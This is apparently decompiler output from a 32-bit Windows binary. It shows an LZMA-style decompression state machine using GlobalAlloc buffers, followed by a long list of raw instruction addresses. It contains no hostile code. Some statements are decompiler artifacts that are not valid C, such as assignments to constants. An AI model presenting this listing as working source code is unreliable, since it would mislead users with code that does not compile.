					switch( *((intOrPtr*)(_t537 * 4 +  &M00406A77))) {
						case 0:
							__eflags = _v112;
							if(_v112 == 0) {
								goto L173;
							}
							_v112 = _v112 - 1;
							_v116 = _v116 + 1;
							_t537 =  *_v116;
							__eflags = _t537 - 0xe1;
							if(_t537 > 0xe1) {
								goto L174;
							}
							_t542 = _t537 & 0x000000ff;
							_push(0x2d);
							asm("cdq");
							_pop(_t576);
							_push(9);
							_pop(_t577);
							_t622 = _t542 / _t576;
							_t544 = _t542 % _t576 & 0x000000ff;
							asm("cdq");
							_t617 = _t544 % _t577 & 0x000000ff;
							_v64 = _t617;
							_v32 = (1 << _t622) - 1;
							_v28 = (1 << _t544 / _t577) - 1;
							_t625 = (0x300 << _t617 + _t622) + 0x736;
							__eflags = 0x600 - _v124;
							if(0x600 == _v124) {
								L12:
								__eflags = _t625;
								if(_t625 == 0) {
									L14:
									_v76 = _v76 & 0x00000000;
									_v68 = _v68 & 0x00000000;
									goto L17;
								} else {
									goto L13;
								}
								do {
									L13:
									_t625 = _t625 - 1;
									__eflags = _t625;
									 *((short*)(_v8 + _t625 * 2)) = 0x400;
								} while (_t625 != 0);
								goto L14;
							}
							__eflags = _v8;
							if(_v8 != 0) {
								GlobalFree(_v8); // executed
							}
							_t537 = GlobalAlloc(0x40, 0x600); // executed
							__eflags = _t537;
							_v8 = _t537;
							if(_t537 == 0) {
								goto L174;
							} else {
								_v124 = 0x600;
								goto L12;
							}
						case 1:
							L15:
							__eflags = _v112;
							if(_v112 == 0) {
								_v140 = 1;
								goto L173;
							}
							_v112 = _v112 - 1;
							_v68 = _v68 | ( *_v116 & 0x000000ff) << _v76 << 0x00000003;
							_v116 = _v116 + 1;
							_t50 =  &_v76;
							 *_t50 = _v76 + 1;
							__eflags =  *_t50;
							L17:
							__eflags = _v76 - 4;
							if(_v76 < 4) {
								goto L15;
							}
							_t550 = _v68;
							__eflags = _t550 - _v120;
							if(_t550 == _v120) {
								L22:
								_v76 = 5;
								 *(_v12 + _v120 - 1) =  *(_v12 + _v120 - 1) & 0x00000000;
								goto L25;
							}
							__eflags = _v12;
							_v120 = _t550;
							if(_v12 != 0) {
								GlobalFree(_v12); // executed
							}
							_t537 = GlobalAlloc(0x40, _v68); // executed
							__eflags = _t537;
							_v12 = _t537;
							if(_t537 == 0) {
								goto L174;
							} else {
								goto L22;
							}
						case 2:
							L26:
							_t557 = _v100 & _v32;
							_v136 = 6;
							_v80 = _t557;
							_t626 = _v8 + ((_v60 << 4) + _t557) * 2;
							goto L135;
						case 3:
							L23:
							__eflags = _v112;
							if(_v112 == 0) {
								_v140 = 3;
								goto L173;
							}
							_v112 = _v112 - 1;
							_t72 =  &_v116;
							 *_t72 = _v116 + 1;
							__eflags =  *_t72;
							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							L25:
							_v76 = _v76 - 1;
							__eflags = _v76;
							if(_v76 != 0) {
								goto L23;
							}
							goto L26;
						case 4:
							L136:
							_t559 =  *_t626;
							_t610 = _t559 & 0x0000ffff;
							_t591 = (_v20 >> 0xb) * _t610;
							__eflags = _v16 - _t591;
							if(_v16 >= _t591) {
								_v20 = _v20 - _t591;
								_v16 = _v16 - _t591;
								_v68 = 1;
								_t560 = _t559 - (_t559 >> 5);
								__eflags = _t560;
								 *_t626 = _t560;
							} else {
								_v20 = _t591;
								_v68 = _v68 & 0x00000000;
								 *_t626 = (0x800 - _t610 >> 5) + _t559;
							}
							__eflags = _v20 - 0x1000000;
							if(_v20 >= 0x1000000) {
								goto L142;
							} else {
								goto L140;
							}
						case 5:
							L140:
							__eflags = _v112;
							if(_v112 == 0) {
								_v140 = 5;
								goto L173;
							}
							_v20 = _v20 << 8;
							_v112 = _v112 - 1;
							_t464 =  &_v116;
							 *_t464 = _v116 + 1;
							__eflags =  *_t464;
							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							L142:
							_t561 = _v136;
							goto L143;
						case 6:
							__edx = 0;
							__eflags = _v68;
							if(_v68 != 0) {
								__eax = _v8;
								__ecx = _v60;
								_v56 = 1;
								_v136 = 7;
								__esi = _v8 + 0x180 + _v60 * 2;
								goto L135;
							}
							__eax = _v96 & 0x000000ff;
							__esi = _v100;
							__cl = 8;
							__cl = 8 - _v64;
							__esi = _v100 & _v28;
							__eax = (_v96 & 0x000000ff) >> 8;
							__ecx = _v64;
							__esi = (_v100 & _v28) << 8;
							__ecx = _v8;
							((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8) = ((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8) + (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8)) * 2;
							__eax = ((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8) + (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8)) * 2 << 9;
							__eflags = _v60 - 4;
							__eax = (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8) + (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8)) * 2 << 9) + _v8 + 0xe6c;
							_v92 = (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8) + (((_v96 & 0x000000ff) >> 8) + ((_v100 & _v28) << 8)) * 2 << 9) + _v8 + 0xe6c;
							if(_v60 >= 4) {
								__eflags = _v60 - 0xa;
								if(_v60 >= 0xa) {
									_t103 =  &_v60;
									 *_t103 = _v60 - 6;
									__eflags =  *_t103;
								} else {
									_v60 = _v60 - 3;
								}
							} else {
								_v60 = 0;
							}
							__eflags = _v56 - __edx;
							if(_v56 == __edx) {
								__ebx = 0;
								__ebx = 1;
								goto L63;
							}
							__eax = _v24;
							__eax = _v24 - _v48;
							__eflags = __eax - _v120;
							if(__eax >= _v120) {
								__eax = __eax + _v120;
								__eflags = __eax;
							}
							__ecx = _v12;
							__ebx = 0;
							__ebx = 1;
							__al =  *((intOrPtr*)(__eax + __ecx));
							_v95 =  *((intOrPtr*)(__eax + __ecx));
							goto L43;
						case 7:
							__eflags = _v68 - 1;
							if(_v68 != 1) {
								__eax = _v40;
								_v132 = 0x16;
								_v36 = _v40;
								__eax = _v44;
								_v40 = _v44;
								__eax = _v48;
								_v44 = _v48;
								__eax = 0;
								__eflags = _v60 - 7;
								0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
								__al = __al & 0x000000fd;
								__eax = (__eflags >= 0) - 1 + 0xa;
								_v60 = (__eflags >= 0) - 1 + 0xa;
								__eax = _v8;
								__eax = _v8 + 0x664;
								__eflags = __eax;
								_v92 = __eax;
								goto L71;
							}
							__eax = _v8;
							__ecx = _v60;
							_v136 = 8;
							__esi = _v8 + 0x198 + _v60 * 2;
							goto L135;
						case 8:
							__eflags = _v68;
							if(_v68 != 0) {
								__eax = _v8;
								__ecx = _v60;
								_v136 = 0xa;
								__esi = _v8 + 0x1b0 + _v60 * 2;
							} else {
								__eax = _v60;
								__ecx = _v8;
								__eax = _v60 + 0xf;
								_v136 = 9;
								_v60 + 0xf << 4 = (_v60 + 0xf << 4) + _v80;
								__esi = _v8 + ((_v60 + 0xf << 4) + _v80) * 2;
							}
							goto L135;
						case 9:
							__eflags = _v68;
							if(_v68 != 0) {
								goto L92;
							}
							__eflags = _v100;
							if(_v100 == 0) {
								goto L174;
							}
							__eax = 0;
							__eflags = _v60 - 7;
							_t264 = _v60 - 7 >= 0;
							__eflags = _t264;
							0 | _t264 = _t264 + _t264 + 9;
							_v60 = _t264 + _t264 + 9;
							goto L78;
						case 0xa:
							__eflags = _v68;
							if(_v68 != 0) {
								__eax = _v8;
								__ecx = _v60;
								_v136 = 0xb;
								__esi = _v8 + 0x1c8 + _v60 * 2;
								goto L135;
							}
							__eax = _v44;
							goto L91;
						case 0xb:
							__eflags = _v68;
							if(_v68 != 0) {
								__ecx = _v40;
								__eax = _v36;
								_v36 = _v40;
							} else {
								__eax = _v40;
							}
							__ecx = _v44;
							_v40 = _v44;
							L91:
							__ecx = _v48;
							_v48 = __eax;
							_v44 = _v48;
							L92:
							__eax = _v8;
							_v132 = 0x15;
							__eax = _v8 + 0xa68;
							_v92 = _v8 + 0xa68;
							goto L71;
						case 0xc:
							L102:
							__eflags = _v112;
							if(_v112 == 0) {
								_v140 = 0xc;
								goto L173;
							}
							__ecx = _v116;
							__eax = _v16;
							_v20 = _v20 << 8;
							__ecx =  *_v116 & 0x000000ff;
							_v112 = _v112 - 1;
							_v16 << 8 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							_t340 =  &_v116;
							 *_t340 = _v116 + 1;
							__eflags =  *_t340;
							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							__eax = _v48;
							goto L104;
						case 0xd:
							L39:
							__eflags = _v112;
							if(_v112 == 0) {
								_v140 = 0xd;
								goto L173;
							}
							__ecx = _v116;
							__eax = _v16;
							_v20 = _v20 << 8;
							__ecx =  *_v116 & 0x000000ff;
							_v112 = _v112 - 1;
							_v16 << 8 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							_t127 =  &_v116;
							 *_t127 = _v116 + 1;
							__eflags =  *_t127;
							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							L41:
							__eax = _v68;
							__eflags = _v76 - _v68;
							if(_v76 != _v68) {
								goto L50;
							}
							__eflags = __ebx - 0x100;
							if(__ebx >= 0x100) {
								goto L56;
							}
							L43:
							__eax = _v95 & 0x000000ff;
							_v95 = _v95 << 1;
							__ecx = _v92;
							__eax = (_v95 & 0x000000ff) >> 7;
							_v76 = __eax;
							__eax = __eax + 1;
							__eax = __eax << 8;
							__eax = __eax + __ebx;
							__esi = _v92 + __eax * 2;
							_v20 = _v20 >> 0xb;
							__ax =  *__esi;
							_v88 = __esi;
							__edx = __ax & 0x0000ffff;
							__ecx = (_v20 >> 0xb) * __edx;
							__eflags = _v16 - __ecx;
							if(_v16 >= __ecx) {
								_v20 = _v20 - __ecx;
								_v16 = _v16 - __ecx;
								__cx = __ax;
								_v68 = 1;
								__cx = __ax >> 5;
								__eflags = __eax;
								__ebx = __ebx + __ebx + 1;
								 *__esi = __ax;
							} else {
								_v68 = _v68 & 0x00000000;
								_v20 = __ecx;
								0x800 = 0x800 - __edx;
								0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
								__ebx = __ebx + __ebx;
								 *__esi = __cx;
							}
							__eflags = _v20 - 0x1000000;
							_v72 = __ebx;
							if(_v20 >= 0x1000000) {
								goto L41;
							} else {
								goto L39;
							}
						case 0xe:
							L48:
							__eflags = _v112;
							if(_v112 == 0) {
								_v140 = 0xe;
								goto L173;
							}
							__ecx = _v116;
							__eax = _v16;
							_v20 = _v20 << 8;
							__ecx =  *_v116 & 0x000000ff;
							_v112 = _v112 - 1;
							_v16 << 8 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							_t161 =  &_v116;
							 *_t161 = _v116 + 1;
							__eflags =  *_t161;
							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							while(1) {
								L50:
								__eflags = __ebx - 0x100;
								if(__ebx >= 0x100) {
									break;
								}
								__eax = _v92;
								__edx = __ebx + __ebx;
								__ecx = _v20;
								__esi = __edx + __eax;
								__ecx = _v20 >> 0xb;
								__ax =  *__esi;
								_v88 = __esi;
								__edi = __ax & 0x0000ffff;
								__ecx = (_v20 >> 0xb) * __edi;
								__eflags = _v16 - __ecx;
								if(_v16 >= __ecx) {
									_v20 = _v20 - __ecx;
									_v16 = _v16 - __ecx;
									__cx = __ax;
									_t175 = __edx + 1; // 0x1
									__ebx = _t175;
									__cx = __ax >> 5;
									__eflags = __eax;
									 *__esi = __ax;
								} else {
									_v20 = __ecx;
									0x800 = 0x800 - __edi;
									0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
									__ebx = __ebx + __ebx;
									 *__esi = __cx;
								}
								__eflags = _v20 - 0x1000000;
								_v72 = __ebx;
								if(_v20 >= 0x1000000) {
									continue;
								} else {
									goto L48;
								}
							}
							L56:
							_t178 =  &_v56;
							 *_t178 = _v56 & 0x00000000;
							__eflags =  *_t178;
							goto L57;
						case 0xf:
							L60:
							__eflags = _v112;
							if(_v112 == 0) {
								_v140 = 0xf;
								goto L173;
							}
							__ecx = _v116;
							__eax = _v16;
							_v20 = _v20 << 8;
							__ecx =  *_v116 & 0x000000ff;
							_v112 = _v112 - 1;
							_v16 << 8 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							_t208 =  &_v116;
							 *_t208 = _v116 + 1;
							__eflags =  *_t208;
							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							L62:
							__eflags = __ebx - 0x100;
							if(__ebx >= 0x100) {
								L57:
								__al = _v72;
								_v96 = _v72;
								goto L58;
							}
							L63:
							__eax = _v92;
							__edx = __ebx + __ebx;
							__ecx = _v20;
							__esi = __edx + __eax;
							__ecx = _v20 >> 0xb;
							__ax =  *__esi;
							_v88 = __esi;
							__edi = __ax & 0x0000ffff;
							__ecx = (_v20 >> 0xb) * __edi;
							__eflags = _v16 - __ecx;
							if(_v16 >= __ecx) {
								_v20 = _v20 - __ecx;
								_v16 = _v16 - __ecx;
								__cx = __ax;
								_t222 = __edx + 1; // 0x1
								__ebx = _t222;
								__cx = __ax >> 5;
								__eflags = __eax;
								 *__esi = __ax;
							} else {
								_v20 = __ecx;
								0x800 = 0x800 - __edi;
								0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
								__ebx = __ebx + __ebx;
								 *__esi = __cx;
							}
							__eflags = _v20 - 0x1000000;
							_v72 = __ebx;
							if(_v20 >= 0x1000000) {
								goto L62;
							} else {
								goto L60;
							}
						case 0x10:
							L112:
							__eflags = _v112;
							if(_v112 == 0) {
								_v140 = 0x10;
								goto L173;
							}
							__ecx = _v116;
							__eax = _v16;
							_v20 = _v20 << 8;
							__ecx =  *_v116 & 0x000000ff;
							_v112 = _v112 - 1;
							_v16 << 8 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							_t371 =  &_v116;
							 *_t371 = _v116 + 1;
							__eflags =  *_t371;
							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							goto L114;
						case 0x11:
							L71:
							__esi = _v92;
							_v136 = 0x12;
							goto L135;
						case 0x12:
							__eflags = _v68;
							if(_v68 != 0) {
								__eax = _v92;
								_v136 = 0x13;
								__esi = _v92 + 2;
								L135:
								_v88 = _t626;
								goto L136;
							}
							__eax = _v80;
							_v52 = _v52 & 0x00000000;
							__ecx = _v92;
							__eax = _v80 << 4;
							__eflags = __eax;
							__eax = _v92 + __eax + 4;
							goto L133;
						case 0x13:
							__eflags = _v68;
							if(_v68 != 0) {
								_t475 =  &_v92;
								 *_t475 = _v92 + 0x204;
								__eflags =  *_t475;
								_v52 = 0x10;
								_v68 = 8;
								L147:
								_v128 = 0x14;
								goto L148;
							}
							__eax = _v80;
							__ecx = _v92;
							__eax = _v80 << 4;
							_v52 = 8;
							__eax = _v92 + (_v80 << 4) + 0x104;
							L133:
							_v92 = __eax;
							_v68 = 3;
							goto L147;
						case 0x14:
							_v52 = _v52 + __ebx;
							__eax = _v132;
							goto L143;
						case 0x15:
							__eax = 0;
							__eflags = _v60 - 7;
							0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
							__al = __al & 0x000000fd;
							__eax = (__eflags >= 0) - 1 + 0xb;
							_v60 = (__eflags >= 0) - 1 + 0xb;
							goto L123;
						case 0x16:
							__eax = _v52;
							__eflags = __eax - 4;
							if(__eax >= 4) {
								_push(3);
								_pop(__eax);
							}
							__ecx = _v8;
							_v68 = 6;
							__eax = __eax << 7;
							_v128 = 0x19;
							_v92 = __eax;
							goto L148;
						case 0x17:
							L148:
							__eax = _v68;
							_v84 = 1;
							_v76 = _v68;
							goto L152;
						case 0x18:
							L149:
							__eflags = _v112;
							if(_v112 == 0) {
								_v140 = 0x18;
								goto L173;
							}
							__ecx = _v116;
							__eax = _v16;
							_v20 = _v20 << 8;
							__ecx =  *_v116 & 0x000000ff;
							_v112 = _v112 - 1;
							_v16 << 8 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							_t490 =  &_v116;
							 *_t490 = _v116 + 1;
							__eflags =  *_t490;
							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
							L151:
							_t493 =  &_v76;
							 *_t493 = _v76 - 1;
							__eflags =  *_t493;
							L152:
							__eflags = _v76;
							if(_v76 <= 0) {
								__ecx = _v68;
								__ebx = _v84;
								0 = 1;
								__eax = 1 << __cl;
								__ebx = _v84 - (1 << __cl);
								__eax = _v128;
								_v72 = __ebx;
								L143:
								_v140 = _t561;
								goto L3;
							}
							__eax = _v84;
							_v20 = _v20 >> 0xb;
							__edx = _v84 + _v84;
							__eax = _v92;
							__esi = __edx + __eax;
							_v88 = __esi;
							__ax =  *__esi;
							__edi = __ax & 0x0000ffff;
							__ecx = (_v20 >> 0xb) * __edi;
							__eflags = _v16 - __ecx;
							if(_v16 >= __ecx) {
								_v20 = _v20 - __ecx;
								_v16 = _v16 - __ecx;
								__cx = __ax;
								__cx = __ax >> 5;
								__eax = __eax - __ecx;
								__edx = __edx + 1;
								__eflags = __edx;
								 *__esi = __ax;
								_v84 = __edx;
							} else {
								_v20 = __ecx;
								0x800 = 0x800 - __edi;
								0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
								_v84 = _v84 << 1;
								 *__esi = __cx;
							}
							__eflags = _v20 - 0x1000000;
							if(_v20 >= 0x1000000) {
								goto L151;
							} else {
								goto L149;
							}
						case 0x19:
							__eflags = __ebx - 4;
							if(__ebx < 4) {
								_v48 = __ebx;
								L122:
								_t399 =  &_v48;
								 *_t399 = _v48 + 1;
								__eflags =  *_t399;
								L123:
								__eax = _v48;
								__eflags = __eax;
								if(__eax == 0) {
									_v52 = _v52 | 0xffffffff;
									goto L173;
								}
								__eflags = __eax - _v100;
								if(__eax > _v100) {
									goto L174;
								}
								_v52 = _v52 + 2;
								__eax = _v52;
								_t406 =  &_v100;
								 *_t406 = _v100 + _v52;
								__eflags =  *_t406;
								goto L126;
							}
							__ecx = __ebx;
							__eax = __ebx;
							__ecx = __ebx >> 1;
							__eax = __ebx & 0x00000001;
							__ecx = (__ebx >> 1) - 1;
							__al = __al | 0x00000002;
							__eax = (__ebx & 0x00000001) << __cl;
							__eflags = __ebx - 0xe;
							_v48 = __eax;
							if(__ebx >= 0xe) {
								__ebx = 0;
								_v76 = __ecx;
								L105:
								__eflags = _v76;
								if(_v76 <= 0) {
									__eax = __eax + __ebx;
									_v68 = 4;
									_v48 = __eax;
									__eax = _v8;
									__eax = _v8 + 0x644;
									__eflags = __eax;
									L111:
									__ebx = 0;
									_v92 = __eax;
									_v84 = 1;
									_v72 = 0;
									_v76 = 0;
									L115:
									__eax = _v68;
									__eflags = _v76 - _v68;
									if(_v76 >= _v68) {
										_t397 =  &_v48;
										 *_t397 = _v48 + __ebx;
										__eflags =  *_t397;
										goto L122;
									}
									__eax = _v84;
									_v20 = _v20 >> 0xb;
									__edi = _v84 + _v84;
									__eax = _v92;
									__esi = __edi + __eax;
									_v88 = __esi;
									__ax =  *__esi;
									__ecx = __ax & 0x0000ffff;
									__edx = (_v20 >> 0xb) * __ecx;
									__eflags = _v16 - __edx;
									if(_v16 >= __edx) {
										__ecx = 0;
										_v20 = _v20 - __edx;
										__ecx = 1;
										_v16 = _v16 - __edx;
										__ebx = 1;
										__ecx = _v76;
										__ebx = 1 << __cl;
										__ecx = 1 << __cl;
										__ebx = _v72;
										__ebx = _v72 | __ecx;
										__cx = __ax;
										__cx = __ax >> 5;
										__eax = __eax - __ecx;
										__edi = __edi + 1;
										__eflags = __edi;
										_v72 = __ebx;
										 *__esi = __ax;
										_v84 = __edi;
									} else {
										_v20 = __edx;
										0x800 = 0x800 - __ecx;
										0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
										_v84 = _v84 << 1;
										 *__esi = __dx;
									}
									__eflags = _v20 - 0x1000000;
									if(_v20 >= 0x1000000) {
										L114:
										_t374 =  &_v76;
										 *_t374 = _v76 + 1;
										__eflags =  *_t374;
										goto L115;
									} else {
										goto L112;
									}
								}
								__ecx = _v16;
								__ebx = __ebx + __ebx;
								_v20 = _v20 >> 1;
								__eflags = _v16 - _v20;
								_v72 = __ebx;
								if(_v16 >= _v20) {
									__ecx = _v20;
									_v16 = _v16 - _v20;
									__ebx = __ebx | 0x00000001;
									__eflags = __ebx;
									_v72 = __ebx;
								}
								__eflags = _v20 - 0x1000000;
								if(_v20 >= 0x1000000) {
									L104:
									_t344 =  &_v76;
									 *_t344 = _v76 - 1;
									__eflags =  *_t344;
									goto L105;
								} else {
									goto L102;
								}
							}
							__edx = _v8;
							__eax = __eax - __ebx;
							_v68 = __ecx;
							__eax = _v8 + 0x55e + __eax * 2;
							goto L111;
						case 0x1a:
							L58:
							__eflags = _v104;
							if(_v104 == 0) {
								_v140 = 0x1a;
								goto L173;
							}
							__ecx = _v108;
							__al = _v96;
							__edx = _v12;
							_v100 = _v100 + 1;
							_v108 = _v108 + 1;
							_v104 = _v104 - 1;
							 *_v108 = __al;
							__ecx = _v24;
							 *(_v12 + __ecx) = __al;
							__eax = __ecx + 1;
							__edx = 0;
							_t197 = __eax % _v120;
							__eax = __eax / _v120;
							__edx = _t197;
							goto L82;
						case 0x1b:
							L78:
							__eflags = _v104;
							if(_v104 == 0) {
								_v140 = 0x1b;
								goto L173;
							}
							__eax = _v24;
							__eax = _v24 - _v48;
							__eflags = __eax - _v120;
							if(__eax >= _v120) {
								__eax = __eax + _v120;
								__eflags = __eax;
							}
							__edx = _v12;
							__cl =  *(__edx + __eax);
							__eax = _v24;
							_v96 = __cl;
							 *(__edx + __eax) = __cl;
							__eax = __eax + 1;
							__edx = 0;
							_t280 = __eax % _v120;
							__eax = __eax / _v120;
							__edx = _t280;
							__eax = _v108;
							_v100 = _v100 + 1;
							_v108 = _v108 + 1;
							_t289 =  &_v104;
							 *_t289 = _v104 - 1;
							__eflags =  *_t289;
							 *_v108 = __cl;
							L82:
							_v24 = __edx;
							goto L83;
						case 0x1c:
							while(1) {
								L126:
								__eflags = _v104;
								if(_v104 == 0) {
									break;
								}
								__eax = _v24;
								__eax = _v24 - _v48;
								__eflags = __eax - _v120;
								if(__eax >= _v120) {
									__eax = __eax + _v120;
									__eflags = __eax;
								}
								__edx = _v12;
								__cl =  *(__edx + __eax);
								__eax = _v24;
								_v96 = __cl;
								 *(__edx + __eax) = __cl;
								__eax = __eax + 1;
								__edx = 0;
								_t420 = __eax % _v120;
								__eax = __eax / _v120;
								__edx = _t420;
								__eax = _v108;
								_v108 = _v108 + 1;
								_v104 = _v104 - 1;
								_v52 = _v52 - 1;
								__eflags = _v52;
								 *_v108 = __cl;
								_v24 = _t420;
								if(_v52 > 0) {
									continue;
								} else {
									L83:
									_v140 = 2;
									goto L3;
								}
							}
							_v140 = 0x1c;
							L173:
							_push(0x22);
							_pop(_t574);
							memcpy(_v148,  &_v140, _t574 << 2);
							return 0;
					}
				}
				L174:
				_t538 = _t537 | 0xffffffff;
				return _t538;
			}










































                        0x00406035
                        0x0040603c
                        0x00406042
                        0x00406048
                        0x00000000
                        0x0040604c
                        0x00406058
                        0x00406058
                        0x00406058
                        0x00406061
                        0x00000000
                        0x00000000
                        0x00406067
                        0x00000000
                        0x0040606e
                        0x00406072
                        0x00000000
                        0x00000000
                        0x0040607b
                        0x0040607e
                        0x00406081
                        0x00406083
                        0x00406085
                        0x00000000
                        0x00000000
                        0x0040608b
                        0x0040608e
                        0x00406090
                        0x00406091
                        0x00406094
                        0x00406096
                        0x00406097
                        0x00406099
                        0x0040609c
                        0x004060a1
                        0x004060a6
                        0x004060af
                        0x004060c2
                        0x004060c5
                        0x004060ce
                        0x004060d1
                        0x004060f9
                        0x004060f9
                        0x004060fb
                        0x00406109
                        0x00406109
                        0x0040610d
                        0x00000000
                        0x00000000
                        0x00000000
                        0x00000000
                        0x004060fd
                        0x004060fd
                        0x00406100
                        0x00406100
                        0x00406101
                        0x00406101
                        0x00000000
                        0x004060fd
                        0x004060d3
                        0x004060d7
                        0x004060dc
                        0x004060dc
                        0x004060e5
                        0x004060eb
                        0x004060ed
                        0x004060f0
                        0x00000000
                        0x004060f6
                        0x004060f6
                        0x00000000
                        0x004060f6
                        0x00000000
                        0x00406113
                        0x00406113
                        0x00406117
                        0x004069c3
                        0x00000000
                        0x004069c3
                        0x00406120
                        0x00406130
                        0x00406133
                        0x00406136
                        0x00406136
                        0x00406136
                        0x00406139
                        0x00406139
                        0x0040613d
                        0x00000000
                        0x00000000
                        0x0040613f
                        0x00406142
                        0x00406145
                        0x0040616f
                        0x00406175
                        0x0040617c
                        0x00000000
                        0x0040617c
                        0x00406147
                        0x0040614b
                        0x0040614e
                        0x00406153
                        0x00406153
                        0x0040615e
                        0x00406164
                        0x00406166
                        0x00406169
                        0x00000000
                        0x00000000
                        0x00000000
                        0x00000000
                        0x00000000
                        0x004061ae
                        0x004061b4
                        0x004061b7
                        0x004061c4
                        0x004061cc
                        0x00000000
                        0x00000000
                        0x00406183
                        0x00406183
                        0x00406187
                        0x004069d2
                        0x00000000
                        0x004069d2
                        0x00406193
                        0x0040619e
                        0x0040619e
                        0x0040619e
                        0x004061a1
                        0x004061a4
                        0x004061a7
                        0x004061aa
                        0x004061ac
                        0x00000000
                        0x00000000
                        0x00000000
                        0x00000000
                        0x00406843
                        0x00406843
                        0x00406849
                        0x0040684f
                        0x00406852
                        0x00406855
                        0x0040686f
                        0x00406872
                        0x00406878
                        0x00406883
                        0x00406883
                        0x00406885
                        0x00406857
                        0x00406857
                        0x00406866
                        0x0040686a
                        0x0040686a
                        0x00406888
                        0x0040688f
                        0x00000000
                        0x00000000
                        0x00000000
                        0x00000000
                        0x00000000
                        0x00406891
                        0x00406891
                        0x00406895
                        0x00406a44
                        0x00000000
                        0x00406a44
                        0x004068a1
                        0x004068a8
                        0x004068b0
                        0x004068b0
                        0x004068b0
                        0x004068b3
                        0x004068b6
                        0x004068b6
                        0x00000000
                        0x00000000
                        0x004061d4
                        0x004061d6
                        0x004061d9
                        0x0040624a
                        0x0040624d
                        0x00406250
                        0x00406257
                        0x00406261
                        0x00000000
                        0x00406261
                        0x004061db
                        0x004061df
                        0x004061e2
                        0x004061e4
                        0x004061e7
                        0x004061ea
                        0x004061ec
                        0x004061ef
                        0x004061f1
                        0x004061f6
                        0x004061f9
                        0x004061fc
                        0x00406200
                        0x00406207
                        0x0040620a
                        0x00406211
                        0x00406215
                        0x0040621d
                        0x0040621d
                        0x0040621d
                        0x00406217
                        0x00406217
                        0x00406217
                        0x0040620c
                        0x0040620c
                        0x0040620c
                        0x00406221
                        0x00406224
                        0x00406242
                        0x00406244
                        0x00000000
                        0x00406244
                        0x00406226
                        0x00406229
                        0x0040622c
                        0x0040622f
                        0x00406231
                        0x00406231
                        0x00406231
                        0x00406234
                        0x00406237
                        0x00406239
                        0x0040623a
                        0x0040623d
                        0x00000000
                        0x00000000
                        0x00406473
                        0x00406477
                        0x00406495
                        0x00406498
                        0x0040649f
                        0x004064a2
                        0x004064a5
                        0x004064a8
                        0x004064ab
                        0x004064ae
                        0x004064b0
                        0x004064b7
                        0x004064b8
                        0x004064ba
                        0x004064bd
                        0x004064c0
                        0x004064c3
                        0x004064c3
                        0x004064c8
                        0x00000000
                        0x004064c8
                        0x00406479
                        0x0040647c
                        0x0040647f
                        0x00406489
                        0x00000000
                        0x00000000
                        0x004064dd
                        0x004064e1
                        0x00406504
                        0x00406507
                        0x0040650a
                        0x00406514
                        0x004064e3
                        0x004064e3
                        0x004064e6
                        0x004064e9
                        0x004064ec
                        0x004064f9
                        0x004064fc
                        0x004064fc
                        0x00000000
                        0x00000000
                        0x00406520
                        0x00406524
                        0x00000000
                        0x00000000
                        0x0040652a
                        0x0040652e
                        0x00000000
                        0x00000000
                        0x00406534
                        0x00406536
                        0x0040653a
                        0x0040653a
                        0x0040653d
                        0x00406541
                        0x00000000
                        0x00000000
                        0x00406591
                        0x00406595
                        0x0040659c
                        0x0040659f
                        0x004065a2
                        0x004065ac
                        0x00000000
                        0x004065ac
                        0x00406597
                        0x00000000
                        0x00000000
                        0x004065b8
                        0x004065bc
                        0x004065c3
                        0x004065c6
                        0x004065c9
                        0x004065be
                        0x004065be
                        0x004065be
                        0x004065cc
                        0x004065cf
                        0x004065d2
                        0x004065d2
                        0x004065d5
                        0x004065d8
                        0x004065db
                        0x004065db
                        0x004065de
                        0x004065e5
                        0x004065ea
                        0x00000000
                        0x00000000
                        0x00406678
                        0x00406678
                        0x0040667c
                        0x00406a1a
                        0x00000000
                        0x00406a1a
                        0x00406682
                        0x00406685
                        0x00406688
                        0x0040668c
                        0x0040668f
                        0x00406695
                        0x00406697
                        0x00406697
                        0x00406697
                        0x0040669a
                        0x0040669d
                        0x00000000
                        0x00000000
                        0x0040626d
                        0x0040626d
                        0x00406271
                        0x004069de
                        0x00000000
                        0x004069de
                        0x00406277
                        0x0040627a
                        0x0040627d
                        0x00406281
                        0x00406284
                        0x0040628a
                        0x0040628c
                        0x0040628c
                        0x0040628c
                        0x0040628f
                        0x00406292
                        0x00406292
                        0x00406295
                        0x00406298
                        0x00000000
                        0x00000000
                        0x0040629e
                        0x004062a4
                        0x00000000
                        0x00000000
                        0x004062aa
                        0x004062aa
                        0x004062ae
                        0x004062b1
                        0x004062b4
                        0x004062b7
                        0x004062ba
                        0x004062bb
                        0x004062be
                        0x004062c0
                        0x004062c6
                        0x004062c9
                        0x004062cc
                        0x004062cf
                        0x004062d2
                        0x004062d5
                        0x004062d8
                        0x004062f4
                        0x004062f7
                        0x004062fa
                        0x004062fd
                        0x00406304
                        0x00406308
                        0x0040630a
